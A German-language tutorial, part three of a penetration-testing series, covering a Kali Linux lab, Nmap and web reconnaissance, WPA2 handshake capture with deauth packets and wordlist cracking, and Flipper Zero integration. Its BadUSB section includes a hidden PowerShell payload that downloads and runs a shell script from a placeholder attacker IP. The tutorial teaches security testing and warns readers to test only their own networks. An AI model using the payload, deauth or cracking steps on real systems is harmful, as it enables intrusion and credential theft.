Der Weg des Hackers: Eine 5-teilige Serie
Teil 1: Einfuehrung → Teil 2: Flipper-Meisterschaft → Teil 3: Kali-Grundlagen → Teil 4: Exploitation → Teil 5: Das vollstaendige Audit
In den Teilen 1 und 2 hast du Karten geklont, Funkfrequenzen analysiert und verstanden, warum die meiste "Sicherheit" nur Theater ist. Du hast Schwachstellen von aussen gesehen. Jetzt gehst du hinein und siehst sie aus der Perspektive des Angreifers.
Kali Linux ist die Branchenstandard-Distribution fuer Penetrationstests. Sie kommt vorinstalliert mit ueber 600 Sicherheitstools. Das kann ueberwältigend wirken. Die meisten Tutorials werfen dich ins kalte Wasser mit Befehlen, die du nicht verstehst und ohne Kontext, warum sie wichtig sind.
Wir machen das anders. Am Ende dieses Artikels wirst du ein funktionierendes Labor haben, Netzwerk-Reconnaissance auf fundamentaler Ebene verstehen und deinen eigenen WiFi-Handshake erfassen. Jeder Schritt baut auf dem vorherigen auf.
Teil 1: Dein Labor aufbauen
Professionelle Penetrationstester fuehren Kali nicht auf ihrer Hauptmaschine aus. Sie verwenden isolierte Umgebungen, die zurueckgesetzt, als Snapshot gespeichert und zerstoert werden koennen, ohne ihr Hauptsystem zu beeintraechtigen. Du wirst das Gleiche tun.
Option A: Virtuelle Maschine (Empfohlen zum Lernen)
Eine virtuelle Maschine gibt dir die sicherste Lernumgebung. Du kannst deinen Fortschritt als Snapshot speichern, Fehler machen und sofort zuruecksetzen.
Was du brauchst
- Host-Maschine: 16GB+ RAM, 50GB+ freier Festplattenspeicher, moderne CPU mit Virtualisierungsunterstuetzung
- Virtualisierungssoftware: VirtualBox (kostenlos) oder VMware Workstation Player (kostenlos fuer den persoenlichen Gebrauch)
- Kali Linux: Offizielle vorgefertigte VM von kali.org
Projekt: Kali-VM-Einrichtung
Zeit: 30-45 Minuten
Schritte:
- Lade das Kali-VM-Image fuer deinen Hypervisor herunter (VirtualBox oder VMware)
- Entpacke das heruntergeladene Archiv (7-Zip empfohlen fuer Windows)
- Importiere die VM in deinen Hypervisor
- Konfiguriere die Ressourcen: 4GB RAM Minimum (8GB empfohlen), 2+ CPU-Kerne
- Aktiviere den Netzwerkadapter im "Bridged"-Modus fuer vollen Netzwerkzugang
- Starte die VM und melde dich mit den Standard-Zugangsdaten an:
kali/kali - Oeffne das Terminal und fuehre aus:
sudo apt update && sudo apt full-upgrade -y - Erstelle einen Snapshot namens "Fresh Install" fuer einfache Wiederherstellung
Erfolg ueberpruefen: Du kannst ein Terminal oeffnen, whoami ausfuehren und kali sehen.
Option B: Dedizierte Hardware (Fuer ernsthaftes Ueben)
Sobald du dich mit Kali wohl fuehlst, eliminiert dedizierte Hardware den VM-Overhead und ermoeglicht vollen Hardwarezugang, was fuer WLAN-Tests unerlässlich ist.
Hardware-Empfehlungen
| Budget-Option | Gebrauchter ThinkPad X230/T430 (100-150$), Intel WiFi ersetzt durch Atheros AR9285 |
|---|---|
| Moderne Option | Framework Laptop mit Linux-kompatiblem WiFi-Modul |
| Dedizierter Sensor | Raspberry Pi 5 4GB mit externem Alfa AWUS036ACH Adapter |
Fuer jetzt ist eine VM perfekt. Dedizierte Hardware wird wichtig, wenn du den Monitor-Modus fuer WLAN-Tests brauchst (spaeter in diesem Artikel behandelt).
Option C: Live-USB (Null Persistenz)
Ein Live-USB fuehrt Kali direkt ohne Installation aus. Alles verschwindet, wenn du ausschaltest. Nuetzlich zum Testen auf verschiedener Hardware, aber du verlierst deine Arbeit jede Sitzung, es sei denn, du erstellst eine persistente Partition.
bash# Create bootable USB on Linux/Mac
sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
# Replace sdX with your USB device (check with 'lsblk')
# On Windows: Use Rufus or balenaEtcherdd zerstoert Daten
Der dd-Befehl schreibt direkt auf die Festplatte ohne Bestaetigung. Ueberpruefe den Gerätenamen dreimal. Das Schreiben auf das falsche Geraet wird dieses Laufwerk komplett loeschen.
Teil 2: Die Terminal-Denkweise
Bevor wir Sicherheitstools anfassen, musst du dich im Terminal wohlfuehlen. Das ist nicht optional. Die GUI existiert in Kali, aber die eigentliche Arbeit passiert auf der Kommandozeile.
Grundlegende Navigation
bash# Know where you are
pwd # Print working directory
# Move around
cd /home/kali # Go to home directory
cd .. # Go up one level
cd - # Go to previous directory
# See what's here
ls # List files
ls -la # List all files with details
ls -lah # Human-readable sizes
# Read files
cat filename # Display entire file
less filename # Scrollable view (q to quit)
head -n 20 filename # First 20 lines
tail -f filename # Follow file in real-time (logs)Privilegien-Eskalation
Viele Sicherheitstools benoetigen Root-Zugang. In Kali gibt dir sudo temporaere Root-Rechte.
bashsudo command # Run single command as root
sudo -i # Start root shell (be careful)
whoami # Check current user
id # Show user and group IDsRoot mit Verantwortung
Als Root zu arbeiten bedeutet kein Sicherheitsnetz. Ein Tippfehler wie rm -rf / zerstoert alles. Modernes Kali verhindert diesen spezifischen Befehl, aber das Prinzip bleibt: Verstehe, was du ausfuehrst, bevor du es ausfuehrst.
Prozessverwaltung
bashps aux # All running processes
top # Real-time process viewer
htop # Better process viewer (install if needed)
# Control processes
ctrl+c # Stop current process
ctrl+z # Suspend process
bg # Resume in background
fg # Bring to foreground
# Kill processes
kill PID # Graceful termination
kill -9 PID # Force kill (last resort)Netzwerkbefehle
baship a # Show network interfaces
ip route # Show routing table
ping -c 4 8.8.8.8 # Test connectivity
curl ifconfig.me # Your public IP
# DNS lookups
nslookup google.com
dig google.comProjekt: Terminal-Orientierung
Zeit: 15 Minuten
Aufgaben:
- Finde deine IP-Adresse im lokalen Netzwerk mit
ip a - Identifiziere dein Standard-Gateway mit
ip route - Pinge dein Gateway, um die Konnektivitaet zu bestätigen
- Liste alle Dateien in
/etcsortiert nach Aenderungszeit:ls -lt /etc | head - Lies die ersten 50 Zeilen von
/etc/passwd:head -n 50 /etc/passwd
Ziel: Du solltest navigieren, den Netzwerkstatus pruefen und Dateien lesen koennen, ohne nachzudenken.
Teil 3: Netzwerk-Reconnaissance mit Nmap
Nmap (Network Mapper) ist das wichtigste Tool, das du lernen wirst. Es entdeckt Hosts, identifiziert Dienste, erkennt Betriebssysteme und kartiert die Netzwerktopologie. Alles andere baut auf der Nmap-Ausgabe auf.
Dein erster Scan
Lass uns dein eigenes Netzwerk scannen. Zuerst identifiziere deinen Netzwerkbereich:
bash# Find your local IP and subnet
ip a | grep inet
# Look for something like: inet 192.168.1.100/24
# The /24 means your network is 192.168.1.0-255bash# Basic discovery scan (your network only)
sudo nmap -sn 192.168.1.0/24
# What this does:
# -sn = ping scan (no port scanning, just host discovery)
# /24 = scan all 256 addresses in this subnetDu wirst eine Ausgabe wie diese sehen:
textNmap scan report for 192.168.1.1
Host is up (0.0025s latency).
MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
Nmap scan report for 192.168.1.50
Host is up (0.0042s latency).
MAC Address: 11:22:33:44:55:66 (Another Manufacturer)Dieser erste Scan sagt dir: "Diese Geraete existieren in meinem Netzwerk." Jetzt stellen wir tiefere Fragen.
Diensterkennung
Sobald du weisst, welche Hosts existieren, willst du wissen, welche Dienste sie ausfuehren.
bash# Scan a single target for open ports and services
sudo nmap -sV 192.168.1.1
# -sV = Version detection (probe open ports for service info)Typische Ausgabe:
textPORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1
80/tcp open http nginx 1.18.0
443/tcp open ssl/http nginx 1.18.0Betriebssystem-Erkennung
bash# Detect OS (requires root)
sudo nmap -O 192.168.1.1
# Combined scan: OS detection + service versions + default scripts
sudo nmap -A 192.168.1.1Port-Zustaende verstehen
Nmap meldet Ports in verschiedenen Zustaenden:
- open - Die Anwendung akzeptiert aktiv Verbindungen. Das ist es, wonach Angreifer suchen.
- closed - Port erreichbar, aber keine Anwendung lauscht. Der Host ist aktiv, aber da ist nichts.
- filtered - Firewall oder Filter blockiert die Sonde. Kann nicht feststellen, ob offen oder geschlossen.
- unfiltered - Port erreichbar, aber Nmap kann nicht feststellen, ob offen oder geschlossen.
Scan-Typen und Tarnung
bash# TCP Connect scan (default, noisy but reliable)
sudo nmap -sT target
# SYN scan (stealthier, default with root)
sudo nmap -sS target
# UDP scan (slow but important - many services use UDP)
sudo nmap -sU target
# Scan all 65535 ports (thorough but slow)
sudo nmap -p- target
# Scan specific ports
sudo nmap -p 22,80,443,8080 target
# Top 1000 common ports (default behavior)
sudo nmap targetNmap Scripting Engine (NSE)
NSE erweitert Nmap mit spezialisierten Skripten fuer Schwachstellenerkennung, Dienstenumeration und mehr.
bash# Run default safe scripts
sudo nmap -sC target
# Check for vulnerabilities
sudo nmap --script vuln target
# SMB enumeration (Windows shares)
sudo nmap --script smb-enum-shares target
# HTTP enumeration
sudo nmap --script http-enum target
# List available scripts
ls /usr/share/nmap/scripts/ | head -20Projekt: Kartiere dein Netzwerk
Zeit: 30 Minuten
Voraussetzungen: Kenne deinen Netzwerkbereich von ip a
- Entdecke alle Hosts:
sudo nmap -sn DEIN_NETZWERK/24 - Liste die entdeckten Hosts und ihre MAC-Adressen auf
- Waehle deinen Router (normalerweise .1) und fuehre aus:
sudo nmap -sV -sC DEIN_ROUTER - Identifiziere alle offenen Ports und Dienste auf deinem Router
- Fuehre
sudo nmap -A DEIN_COMPUTERaus, um zu sehen, was deine eigene Maschine exponiert
Dokumentiere: Erstelle eine Textdatei, die jedes Geraet, seine IP, MAC und Dienste auflistet. Das ist deine Netzwerkkarte.
Scanne nur Netzwerke, die dir gehoeren
Netzwerke ohne Autorisierung zu scannen ist in den meisten Rechtsordnungen illegal. Selbst ein einfacher Nmap-Scan kann als unbefugter Zugang angesehen werden. Beschraenke dich auf dein eigenes Netzwerk, deine eigene Ausruestung und Netzwerke, fuer die du eine ausdrueckliche schriftliche Genehmigung hast.
Teil 4: Web-Reconnaissance
Dein Nmap-Scan hat wahrscheinlich HTTP-Dienste gefunden (Ports 80, 443, 8080). Lass uns verstehen, was dort laeuft.
Whatweb: Schnelle Dienst-Identifikation
bash# Identify web technologies
whatweb http://192.168.1.1Beispielausgabe:
texthttp://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
HTTPServer[nginx/1.18.0], IP[192.168.1.1],
Title[Router Admin], nginx[1.18.0]Nikto: Web-Schwachstellen-Scanner
bash# Scan for common web vulnerabilities
nikto -h http://192.168.1.1
# This checks for:
# - Outdated server software
# - Dangerous files/CGIs
# - Misconfigurations
# - Default credentialsVerzeichnis-Enumeration: Was ist versteckt?
Webserver haben oft Verzeichnisse, die nicht von der Hauptseite verlinkt sind: Admin-Panels, Konfigurationsdateien, Backup-Dateien.
bash# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txtHaeufige Funde:
text/admin (Status: 301)
/backup (Status: 403)
/config (Status: 200)
/login (Status: 200)Wortlisten-Speicherort
Kali enthaelt umfangreiche Wortlisten in /usr/share/wordlists/. Die haeufigsten Verzeichnisse: dirb/, dirbuster/, rockyou.txt (Passwoerter) und seclists/ (umfassende Sammlung).
Projekt: Pruefe die Weboberflaeche deines Routers
Zeit: 20 Minuten
- Fuehre
whatweb http://DEINE_ROUTER_IPaus, um den Server zu identifizieren - Fuehre
nikto -h http://DEINE_ROUTER_IPaus, um auf Schwachstellen zu pruefen - Fuehre
gobuster dir -u http://DEINE_ROUTER_IP -w /usr/share/wordlists/dirb/small.txtaus - Besuche alle entdeckten Verzeichnisse in einem Browser
- Notiere alle Admin-Panels, Versionsnummern oder interessante Funde
Haeufiger Fund: Router-Admin-Seiten mit Standard-Zugangsdaten exponiert.
Teil 5: WLAN-Reconnaissance
Hier wird es interessant. WiFi-Netzwerke senden staendig, und mit den richtigen Tools kannst du Authentifizierungs-Handshakes erfassen: den verschluesselten Austausch, der stattfindet, wenn sich ein Geraet verbindet.
Hardware-Anforderungen
Dein eingebautes WiFi wird dafuer wahrscheinlich nicht funktionieren. Du brauchst einen Adapter, der den Monitor-Modus und Paket-Injection unterstuetzt. Empfohlen: Alfa AWUS036ACH (~50$) oder Alfa AWUS036ACM (~45$). Diese funktionieren sofort mit Kali.
Den Monitor-Modus verstehen
Der normale WiFi-Modus ("Managed Mode") empfaengt nur Pakete, die an dein Geraet adressiert sind. Der Monitor-Modus erfasst alle Pakete in Reichweite, den gesamten Datenverkehr jedes Geraets auf dem Kanal.
bash# Check your wireless interfaces
iwconfig
# Look for your adapter (often wlan0 or wlan1)
# Kill interfering processes
sudo airmon-ng check kill
# Enable monitor mode
sudo airmon-ng start wlan0
# Your interface is now wlan0monNetzwerke scannen
bash# Start capturing wireless traffic
sudo airodump-ng wlan0mon
# You'll see:
# BSSID = Router MAC address
# PWR = Signal strength (higher = closer)
# CH = Channel
# ENC = Encryption (WPA2, WPA3, OPN)
# ESSID = Network name
# Press Ctrl+C to stopWas du siehst, ist jedes WiFi-Netzwerk in Reichweite, ihre Sicherheitseinstellungen und oft die damit verbundenen Geraete. Das ist es, was ein Wardriver sieht, wenn er Nachbarschaften scannt.
Einen Handshake erfassen
Wenn sich ein Geraet mit einem WPA2-Netzwerk verbindet, gibt es einen Vier-Wege-Handshake. Wenn du diesen Handshake erfasst, kannst du versuchen, das Passwort offline zu knacken.
bash# Focus on your target network (your own network!)
sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
# -c CHANNEL = Target's channel from previous scan
# --bssid = Target router's MAC address
# -w capture = Save to files starting with "capture"
# Now wait for a device to connect...
# Or force a reconnection (on YOUR network only):
# In a new terminal:
sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
# This sends 5 deauth packets, disconnecting clients
# They automatically reconnect, generating a handshakeWenn du einen Handshake erfasst, zeigt airodump-ng [ WPA handshake: XX:XX:XX:XX:XX:XX ] in der oberen rechten Ecke an.
Deauth-Angriffe sind illegal
Das Senden von Deauthentifizierungspaketen an Netzwerke, die dir nicht gehoeren, ist ein Bundesverbrechen unter dem Computer Fraud and Abuse Act (in den USA) und aehnlichen Gesetzen anderswo. Teste nur in deinem eigenen Netzwerk. Das Ziel ist, die Schwachstelle zu verstehen, nicht andere anzugreifen.
Den Handshake knacken
Mit einem erfassten Handshake kannst du versuchen, das Passwort offline mit einer Wortliste zu knacken:
bash# Crack using a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
# If the password is in the wordlist, you'll see:
# KEY FOUND! [ password123 ]
# For stronger passwords, use hashcat (GPU-accelerated)
# First, convert capture format:
cap2hccapx capture-01.cap capture.hccapx
# Then crack with hashcat:
hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txtRealitaetscheck zur Passwortstaerke
rockyou.txt enthaelt ueber 14 Millionen Passwoerter aus echten Datenlecks. Wenn dein WiFi-Passwort "password123" oder "sommer2024" oder der Name deines Hundes ist, ist es in Sekunden knackbar. Ein zufaelliges Passwort mit ueber 12 Zeichen wuerde Millionen von Jahren zum Brute-Forcen benoetigen.
Projekt: Teste deine WiFi-Sicherheit
Zeit: 45 Minuten
Voraussetzungen: Externer WiFi-Adapter mit Monitor-Modus-Unterstuetzung
- Aktiviere den Monitor-Modus:
sudo airmon-ng start wlan0 - Scanne nach Netzwerken:
sudo airodump-ng wlan0mon - Notiere Kanal und BSSID deines eigenen Netzwerks
- Erfasse auf deinem Kanal:
sudo airodump-ng -c CHANNEL --bssid DEIN_BSSID -w meinwifi wlan0mon - Verbinde ein Geraet erneut mit deinem WiFi (oder verwende Deauth in DEINEM Netzwerk)
- Bestaetige die Handshake-Erfassung
- Teste gegen rockyou.txt:
aircrack-ng -w /usr/share/wordlists/rockyou.txt meinwifi-01.cap
Ergebnis: Wenn dein Passwort gefunden wurde, aendere es sofort in etwas Zufaelliges und Langes (ueber 20 Zeichen).
Teil 6: Deinen Flipper Zero verbinden
Erinnerst du dich an all die Captures aus Teil 2? Lass uns sie in deinen Kali-Workflow integrieren.
Dateien uebertragen
bash# Connect Flipper via USB
# It appears as a mass storage device
# Mount if not auto-mounted
sudo mount /dev/sda1 /mnt/flipper
# Your captures are in:
/mnt/flipper/subghz/ # Sub-GHz captures
/mnt/flipper/nfc/ # NFC dumps
/mnt/flipper/infrared/ # IR captures
/mnt/flipper/lfrfid/ # 125kHz RFID
/mnt/flipper/badusb/ # BadUSB scriptsNFC-Dumps analysieren
bash# Install libnfc tools
sudo apt install libnfc-bin mfoc mfcuk
# Flipper saves NFC as .nfc text format
# Convert to binary for analysis:
python3 flipper_nfc_to_mfd.py card.nfc card.mfd
# Analyze MIFARE Classic dump
hexdump -C card.mfd | lessSub-GHz-Analyse
bash# Flipper's .sub files are text-based
cat garage_door.sub
# Contains:
# - Frequency (315MHz, 433MHz, etc.)
# - Protocol or RAW data
# - Timing information
# For deeper RF analysis, use:
# - Universal Radio Hacker (URH)
# - GNU Radio
# - rtl_433 (with SDR hardware)BadUSB-Entwicklung
Erstelle BadUSB-Payloads in Kali, teste sie auf dem Flipper:
bash# Flipper uses DuckyScript-compatible syntax
# Create payload on Kali:
cat > kali_connect.txt << 'EOF'
DELAY 1000
GUI r
DELAY 500
STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
ENTER
EOF
# Host the payload from Kali:
python3 -m http.server 8000
# Copy to Flipper's badusb folder
cp kali_connect.txt /mnt/flipper/badusb/BadUSB-Payloads sind maechtig
Diese Skripte werden automatisch ausgefuehrt, wenn sie eingesteckt werden. Ein boesartiger Payload koennte Backdoors installieren, Zugangsdaten stehlen oder Daten in Sekunden zerstoeren. Verwende sie nur auf deinen eigenen Maschinen zum Testen. Lasse deinen Flipper nie dort, wo jemand anderes ihn einstecken koennte.
Teil 7: Dokumentation und Workflow
Professionelle Penetrationstester fuehren nicht nur Tools aus. Sie dokumentieren alles. Gute Dokumentation trennt Amateure von Profis.
Notizen mit CherryTree
bash# Install CherryTree (hierarchical note-taking)
sudo apt install cherrytree
# Organize notes by:
# - Target/network
# - Reconnaissance
# - Enumeration
# - Vulnerabilities
# - Exploitation attempts
# - Post-exploitationNmap-Ausgabe speichern
bash# Save in all formats
sudo nmap -sV -sC -oA scan_results target
# Creates:
# scan_results.nmap (human-readable)
# scan_results.xml (parseable)
# scan_results.gnmap (greppable)Sitzungsprotokollierung
bash# Log entire terminal session
script session_$(date +%Y%m%d_%H%M%S).log
# Now every command and output is recorded
# Type 'exit' to stop loggingDer Weg des Hackers
Eine 5-teilige Serie, die dich von neugierig zu kompetent bringt.
Teil 1: Einfuehrung Teil 2: Flipper-Meisterschaft Teil 3: Kali-Grundlagen ✓ Teil 4: Exploitation Teil 5: Vollstaendiges Audit
Checkliste Teil 3
☐ Lab-Einrichtung: Kali-VM laeuft, aktualisiert, Snapshot gespeichert
☐ Terminal: Sicher in Navigation, Berechtigungen, Prozesskontrolle
☐ Nmap: Netzwerk kartiert, Dienste identifiziert, Router gescannt
☐ Web-Recon: Router-Weboberflaeche mit whatweb/nikto analysiert
☐ WLAN: Monitor-Modus aktiviert, Netzwerke gescannt
☐ Handshake: Eigener WiFi-Handshake erfasst und getestet
☐ Flipper: Dateien uebertragen, Workflow verstanden
☐ Dokumentation: Notizen organisiert, Scans gespeichert
Was kommt als naechstes
Du hast dein Labor aufgebaut und die Reconnaissance-Phase gelernt. Du kannst Hosts entdecken, Dienste identifizieren und WLAN-Handshakes erfassen. Du verstehst, was Angreifer sehen, wenn sie ein Netzwerk betrachten.
In Teil 4 gehen wir von der Reconnaissance zur Exploitation ueber. Du wirst lernen:
- Metasploit Framework, das Schweizer Taschenmesser der Exploitation
- Gaengige Workflows zur Schwachstellenausnutzung
- Post-Exploitation-Techniken: was nach dem initialen Zugang passiert
- Privilegien-Eskalation: vom normalen Benutzer zum Administrator
- Pivoting: ein kompromittiertes System nutzen, um andere anzugreifen
Reconnaissance sagt dir, wo die Tueren sind. Exploitation lehrt dich, wie du durch sie hindurchgehst.
Du hast das Territorium kartiert. Jetzt lernst du, darin zu navigieren. Teil 4 bringt dich vom Beobachter zum Operator.
Wir sehen uns in Teil 4.